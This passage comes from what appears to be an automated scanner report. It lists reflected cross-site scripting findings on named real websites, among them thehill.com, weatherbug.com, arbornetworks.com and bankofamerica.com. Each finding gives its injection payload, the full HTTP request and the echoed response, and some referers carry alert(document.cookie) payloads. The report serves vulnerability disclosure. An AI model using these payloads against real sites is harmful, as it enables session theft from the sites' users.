Date: Thu, 03 Feb 2011 01:24:37 GMT
Server: Apache
Set-Cookie: PHPSESSID=4rtpcdn9ep0nfp5tqbhmaq6ve1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type
...[SNIP]...
<a title="ip boardc8b75 script alert 1 script 47d05c4592a Free Download - windows software" href="http://download.wareseeker.com/ip-boardc8b75"><script>alert(1)</script>47d05c4592a/" class="selected allsoftware">
...[SNIP]...

3.62. http://search.wareseeker.com/ip-board/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wareseeker.com
Path:   /ip-board/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad93e"><script>alert(1)</script>125f5dcb899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1 HTTP/1.1
Host: search.wareseeker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:24:34 GMT
Server: Apache
Set-Cookie: PHPSESSID=v5k6266f8pht791v1r546ej5o3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type
...[SNIP]...
<a rel="nofollow" href="http://search.wareseeker.com/ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1p-2/">
...[SNIP]...

3.63. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/WareSeekercom/ROS/tags.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a25e7<a>ea4068e9f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/WareSeekercoma25e7<a>ea4068e9f94/ROS/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Thu, 03 Feb 2011 01:33:43 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Thu, 03 Feb 2011 02:33:43 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11790

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "wareseekercoma25e7<a>ea4068e9f94";
t.adSpace = "ros";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/dis
...[SNIP]...

3.64. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/WareSeekercom/ROS/tags.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 66ae8<a>a5a81e35302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/WareSeekercom/ROS66ae8<a>a5a81e35302/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Thu, 03 Feb 2011 01:34:05 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Thu, 03 Feb 2011 02:34:05 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11790

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "wareseekercom";
t.adSpace = "ros66ae8<a>a5a81e35302";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

3.65. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650aa'><script>alert(1)</script>2295b33377e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:20:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=en4idpn2cplbg96q3m2b2f49c7; path=/
Connection: close
Content-Length: 73997

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href='/blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more#comments'>
...[SNIP]...

3.66. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f52a1'><script>alert(1)</script>1f00b24b3b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4 HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 02:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 02:15:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=2tr8nhs6ici1dq18j4impjn8o0; path=/
Connection: close
Content-Length: 76050

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4#comments'>
...[SNIP]...

3.67. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 was submitted in the REST URL parameter 4. This input was echoed as 84351'><img src=a onerror=alert(1)>b4355392092 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:20:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=4tgmbjdtk4fojqqj58b8p4hiq3; path=/
Connection: close
Content-Length: 74000

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img src=a onerror=alert(1)>b4355392092#comments'>
...[SNIP]...

3.68. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /desktop-weather/web-widgets/getSticker.html

Issue detail

The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c7f"style%3d"x%3aexpression(alert(1))"3660fe20f2a was submitted in the ZCode parameter. This input was echoed as 82c7f"style="x:expression(alert(1))"3660fe20f2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /desktop-weather/web-widgets/getSticker.html?CityCode=800326&ZCode=z554582c7f"style%3d"x%3aexpression(alert(1))"3660fe20f2a&Size=250x250&StationID=VMMC&units=1&Version=2 HTTP/1.1
Host: weather.weatherbug.com
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1465904929-1294800439843; s_vi=[CS]v1|26968B0D051593FE-600001A2C00484CA[CE]; OAX=rcHW800tFhsAALQo; RMAM=01TFSM_.4fI8bZDG|TFSM_1700.4fKIQL6G|; wxbug_cookie1=camera_id=&dma=&lang_id=en-US&zip=&city=50064&postal_code=&stat=SABE&city_name=Buenos Aires&state_code=&state_name=&country=AR&country_name=Argentina&region=10&region_name=South America&units=0&has_cookies=1; RMFD=011PdrDqO101FnC|O101FnE|O101GDp; wxbug_cookie2=&country_name0=Argentina&state_code0=&city_name0=Buenos Aires&zip0=&stat0=SABE&country_name1=USA&state_code1=&city_name1=&zip1=&stat1=SABE&country_name2=&state_code2=&city_name2=&zip2=&stat2=&country_name3=&state_code3=&city_name3=&zip3=&stat3=&country_name4=&state_code4=&city_name4=&zip4=&stat4=; __utma_a2a=6534489744.1326357366.1294800440.1295040624.1295040629.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=utf-8
p3p: CP="NON DSP COR NID"
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 01:33:32 GMT
Connection: close
Content-Length: 2116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>WeatherBug&r
...[SNIP]...
<a href="http://weather.weatherbug.com/Macau/Macao-weather.html?zcode=z554582c7f"style="x:expression(alert(1))"3660fe20f2a&units=1&stat=VMMC" target='_blank'>
...[SNIP]...

3.69. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /desktop-weather/web-widgets/getSticker.html

Issue detail

The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cce12'style%3d'x%3aexpression(alert(1))'28b5d32a9d was submitted in the ZCode parameter. This input was echoed as cce12'style='x:expression(alert(1))'28b5d32a9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /desktop-weather/web-widgets/getSticker.html?CityCode=800326&ZCode=z5545cce12'style%3d'x%3aexpression(alert(1))'28b5d32a9d&Size=250x250&StationID=VMMC&units=1&Version=2 HTTP/1.1
Host: weather.weatherbug.com
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1465904929-1294800439843; s_vi=[CS]v1|26968B0D051593FE-600001A2C00484CA[CE]; OAX=rcHW800tFhsAALQo; RMAM=01TFSM_.4fI8bZDG|TFSM_1700.4fKIQL6G|; wxbug_cookie1=camera_id=&dma=&lang_id=en-US&zip=&city=50064&postal_code=&stat=SABE&city_name=Buenos Aires&state_code=&state_name=&country=AR&country_name=Argentina&region=10&region_name=South America&units=0&has_cookies=1; RMFD=011PdrDqO101FnC|O101FnE|O101GDp; wxbug_cookie2=&country_name0=Argentina&state_code0=&city_name0=Buenos Aires&zip0=&stat0=SABE&country_name1=USA&state_code1=&city_name1=&zip1=&stat1=SABE&country_name2=&state_code2=&city_name2=&zip2=&stat2=&country_name3=&state_code3=&city_name3=&zip3=&stat3=&country_name4=&state_code4=&city_name4=&zip4=&stat4=; __utma_a2a=6534489744.1326357366.1294800440.1295040624.1295040629.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=utf-8
p3p: CP="NON DSP COR NID"
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 01:33:34 GMT
Connection: close
Content-Length: 2113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>WeatherBug&r
...[SNIP]...
<a href='http://weather.weatherbug.com/Macau/Macao-weather.html?zcode=z5545cce12'style='x:expression(alert(1))'28b5d32a9d&units=1&stat=VMMC' target='_blank' style='text-decoration:none;'>
...[SNIP]...

3.70. http://www.arbornetworks.com/index.php [Itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 889f8"><script>alert(1)</script>a4569f63444 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_performs&formid=20&Itemid=76889f8"><script>alert(1)</script>a4569f63444&id=112 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:50:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=41c910c218fb8d3dde5e7afce882c91b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:50:28 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html
Content-Length: 37618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<form enctype="multipart/form-data" method="post" action="/index.php?option=com_performs&formid=20&Itemid=76889f8"><script>alert(1)</script>a4569f63444&id=112&Itemid=76889f8\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;a4569f63444&id=112" name="InfrastructureSecurityReport"
id="InfrastructureSecurityReport">
...[SNIP]...

3.71. http://www.arbornetworks.com/index.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0d0"><script>alert(1)</script>718295ddb4 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_performs&formid=20&Itemid=76&id=112ba0d0"><script>alert(1)</script>718295ddb4 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:50:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=fadd3809d81b132b8f85a5e9ab0ae0d9; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:46 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:50:48 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html
Content-Length: 38715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<form enctype="multipart/form-data" method="post" action="/index.php?option=com_performs&formid=20&Itemid=76&id=112ba0d0"><script>alert(1)</script>718295ddb4&Itemid=76&id=112ba0d0\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;718295ddb4" name="InfrastructureSecurityReport"
id="InfrastructureSecurityReport">
...[SNIP]...

3.72. http://www.arbornetworks.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458c5"><script>alert(1)</script>6fafaf87cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_performs&formid=20&Itemid=76&id=112&458c5"><script>alert(1)</script>6fafaf87cd=1 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:51:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6050b437cb834c6dd502f609c181f33c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:16 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:16 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:17 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:51:17 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html
Content-Length: 38736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<form enctype="multipart/form-data" method="post" action="/index.php?option=com_performs&formid=20&Itemid=76&id=112&458c5"><script>alert(1)</script>6fafaf87cd=1&Itemid=76&id=112" name="InfrastructureSecurityReport"
id="InfrastructureSecurityReport">
...[SNIP]...

3.73. http://www.bankofamerica.com/creditcards/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /creditcards/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b49"><script>alert(1)</script>f4d8274700e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /creditcardsa4b49"><script>alert(1)</script>f4d8274700e/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:10 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/creditcardsa4b49"><script>alert(1)</script>f4d8274700e/index.cfm">
...[SNIP]...

